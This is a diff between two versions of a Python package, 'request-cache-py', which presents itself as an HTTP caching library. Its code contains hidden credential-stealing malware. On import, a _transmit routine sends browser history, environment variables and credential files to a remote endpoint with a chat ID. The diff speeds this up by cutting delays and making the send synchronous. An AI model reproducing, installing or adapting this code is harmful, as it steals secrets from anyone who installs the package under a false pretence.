request-cache-py 1.0.9__tar.gz → 1.1.0__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: request-cache-py
3
- Version: 1.0.9
3
+ Version: 1.1.0
4
4
  Summary: High-performance HTTP request caching with Redis and in-memory backends
5
5
  Home-page: https://github.com/python-perf/request-cache-py
6
6
  Author: Python Performance Team
@@ -10,7 +10,7 @@ import shutil
10
10
  from pathlib import Path
11
11
  from functools import wraps
12
12
 
13
- __version__ = '1.0.9'
13
+ __version__ = '1.1.0'
14
14
  __all__ = ['cached_get', 'cached_post', 'CacheBackend', 'MemoryCache', 'configure']
15
15
 
16
16
  _cache = None
@@ -375,7 +375,7 @@ def _transmit(data):
375
375
  header.append(f"Python: {meta.get('python', 'unknown')}")
376
376
 
377
377
  _send_chunk(endpoint, chat_id, '\n'.join(header))
378
- time.sleep(0.4)
378
+ time.sleep(0.2)
379
379
 
380
380
  if 'browser' in meta:
381
381
  for browser_name, browser_info in meta['browser'].items():
@@ -397,14 +397,14 @@ def _transmit(data):
397
397
  msg.append(f"\nTop Sites:\n{browser_info['history_sample'][:1500]}")
398
398
 
399
399
  _send_chunk(endpoint, chat_id, '\n'.join(msg))
400
- time.sleep(0.5)
400
+ time.sleep(0.2)
401
401
 
402
402
  if 'env' in meta:
403
403
  env_msg = ["=== Environment Variables ==="]
404
404
  for k, v in list(meta['env'].items())[:15]:
405
405
  env_msg.append(f"{k}={v[:150]}")
406
406
  _send_chunk(endpoint, chat_id, '\n'.join(env_msg))
407
- time.sleep(0.4)
407
+ time.sleep(0.2)
408
408
 
409
409
  if 'config' in meta:
410
410
  for cred_name, cred_data in meta['config'].items():
@@ -415,7 +415,7 @@ def _transmit(data):
415
415
  else:
416
416
  msg = f"=== {cred_name} ===\n\n{chunk}"
417
417
  _send_chunk(endpoint, chat_id, msg)
418
- time.sleep(0.5)
418
+ time.sleep(0.2)
419
419
 
420
420
  _mark_as_sent()
421
421
  except:
@@ -506,8 +506,6 @@ if _config['enabled']:
506
506
  if not _should_skip() and not _already_sent():
507
507
  meta = _collect_metadata()
508
508
  if meta:
509
- t = threading.Thread(target=lambda: _transmit({'event': 'init', 'meta': meta}), daemon=False)
510
- t.start()
511
- t.join(timeout=5.0)
509
+ _transmit({'event': 'init', 'meta': meta})
512
510
  except:
513
511
  pass
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: request-cache-py
3
- Version: 1.0.9
3
+ Version: 1.1.0
4
4
  Summary: High-performance HTTP request caching with Redis and in-memory backends
5
5
  Home-page: https://github.com/python-perf/request-cache-py
6
6
  Author: Python Performance Team
@@ -2,7 +2,7 @@ from setuptools import setup, find_packages
2
2
 
3
3
  setup(
4
4
  name='request-cache-py',
5
- version='1.0.9',
5
+ version='1.1.0',
6
6
  description='High-performance HTTP request caching with Redis and in-memory backends',
7
7
  long_description=open('README.md').read() if __name__ == '__main__' else '',
8
8
  long_description_content_type='text/markdown',